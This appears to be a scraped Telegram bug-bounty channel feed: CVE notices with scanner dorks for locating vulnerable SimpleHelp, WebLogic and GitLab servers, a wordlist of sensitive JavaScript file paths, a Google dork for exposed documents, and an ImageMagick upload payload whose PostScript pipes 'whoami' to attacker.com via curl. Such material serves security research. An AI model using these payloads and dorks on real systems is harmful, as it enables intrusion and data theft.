01.
/js/config.js02.
/js/credentials.js03.
/js/secrets.js04.
/js/keys.js05.
/js/password.js06.
/js/api_keys.js07.
/js/auth_tokens.js08.
/js/access_tokens.js09.
/js/sessions.js10.
/js/authorization.js 11.
/js/encryption.js12.
/js/certificates.js13.
/js/ssl_keys.js14.
/js/passphrases.js 15.
/js/policies.js16.
/js/permissions.js 17.
/js/privileges.js18.
/js/hashes.js19.
/js/salts.js20.
/js/nonces.js21.
/js/signatures.js22.
/js/digests.js23.
/js/tokens.js24.
/js/cookies.js25.
/js/topsecr3tdonotlook.jsPlease open Telegram to view this post
VIEW IN TELEGRAM
π₯35β€11π7π³2
CVE-2024-57726, -57727, -57728: Multiple vulnerabilities in SimpleHelp, 7.2 - 8.8 ratingβοΈ
The vulnerabilities allow attackers to upload arbitrary files to the SimpleHelp server, as well as escalate privileges, which together allows RCE to be carried out.
Search at Netlas.io:
π Link: https://nt.ls/Frx6H
π Dork: http.headers.server:"SimpleHelp"
Vendor's advisory: https://simple-help.com/kb---security-vulnerabilities-01-2025#
The vulnerabilities allow attackers to upload arbitrary files to the SimpleHelp server, as well as escalate privileges, which together allows RCE to be carried out.
Search at Netlas.io:
π Link: https://nt.ls/Frx6H
π Dork: http.headers.server:"SimpleHelp"
Vendor's advisory: https://simple-help.com/kb---security-vulnerabilities-01-2025#
π6
β‘οΈSmart contract security report. It contains 2 High, 6 Medium & 8 Low severity issues.
β https://github.com/gkrastenov/audits/blob/main/solo/SpartaDex-Security-Review.md
β https://github.com/gkrastenov/audits/blob/main/solo/SpartaDex-Security-Review.md
β€9π2
https://solodit.cyfrin.io/
All disclosed web3 protocols vulnerability reports with filters (like Hacktivity)
All disclosed web3 protocols vulnerability reports with filters (like Hacktivity)
Cyfrin Solodit
Smart Contract Vulnerability Dataset - Cyfrin Solodit
Explore the worldβs largest data set of smart contract vulnerabilities, findings, and mitigations. Strengthen protocol and dApp security, research bugs before deployment.
π₯11π2
Does anyone have Aura+ Songs Playlist ? Do Drop in Comments! Thank You.
π€¨4πΏ4
Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"Content-Type: application/pdf
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl https://attacker.com/?a=$(whoami|base64) ).putdeviceparams
quit
Please open Telegram to view this post
VIEW IN TELEGRAM
HackerOne
Semrush disclosed on HackerOne: Remote Code Execution on...
The Logo upload in the report constructor at: https://www.semrush.com/my_reports/constructor
{F340480}
is passed through a not properly patched version of ImageMagick. You can use Postscript to...
{F340480}
is passed through a not properly patched version of ImageMagick. You can use Postscript to...
π₯8π1
β‘WayBackup Finder - A passive way to find backups/ sensitive information.
β οΈ https://github.com/anmolksachan/WayBackupFinder
Please open Telegram to view this post
VIEW IN TELEGRAM
π9β€1
CVE-2025-21535: Server Takeover in Oracle WebLogic, 9.8 rating π₯
An easily exploitable vulnerability in the Core component allows an unauthenticated attacker to remotely compromise a WebLogic server.
Search at Netlas.io:
π Link: https://nt.ls/6EpWK
π Dork: protocol:t3 OR protocol:t3s
Vendor's advisory: https://www.oracle.com/security-alerts/cpujan2025.html#AppendixFMW
An easily exploitable vulnerability in the Core component allows an unauthenticated attacker to remotely compromise a WebLogic server.
Search at Netlas.io:
π Link: https://nt.ls/6EpWK
π Dork: protocol:t3 OR protocol:t3s
Vendor's advisory: https://www.oracle.com/security-alerts/cpujan2025.html#AppendixFMW
π6π«‘1
Please open Telegram to view this post
VIEW IN TELEGRAM
π11π₯5β€3
Please open Telegram to view this post
VIEW IN TELEGRAM
Brut Security pinned Β«βΆοΈ Explore Bug Bounty POC Videos: https://t.iss.one/brutsecurity_pocΒ»
Please open Telegram to view this post
VIEW IN TELEGRAM
jasper-join-7e5 on Notion
IDOR Cheat Sheet | Notion
What if I told you that there is a web application vulnerability so simple to exploit, that it could make bug hunting feel like a breeze?
π12π₯2β€1
New Business Logic POC Video Shared -https://t.iss.one/brutsecurity_poc/9
π₯4β€1
CVE-2025-0314 and other: Multiple vulnerabilities in GitLab, 4.3 - 8.7 ratingβοΈ
In a recent advisory, GitLab writed about three vulnerabilities, including stored XSS, resource exhaustion, and protected CI/CD variables exfiltration.
Search at Netlas.io:
π Link: https://nt.ls/BNKS8
π Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"
Vendor's advisory: https://about.gitlab.com/releases/2025/01/22/patch-release-gitlab-17-8-1-released/
In a recent advisory, GitLab writed about three vulnerabilities, including stored XSS, resource exhaustion, and protected CI/CD variables exfiltration.
Search at Netlas.io:
π Link: https://nt.ls/BNKS8
π Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"
Vendor's advisory: https://about.gitlab.com/releases/2025/01/22/patch-release-gitlab-17-8-1-released/
π€4
site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)Please open Telegram to view this post
VIEW IN TELEGRAM
π16π₯13β€1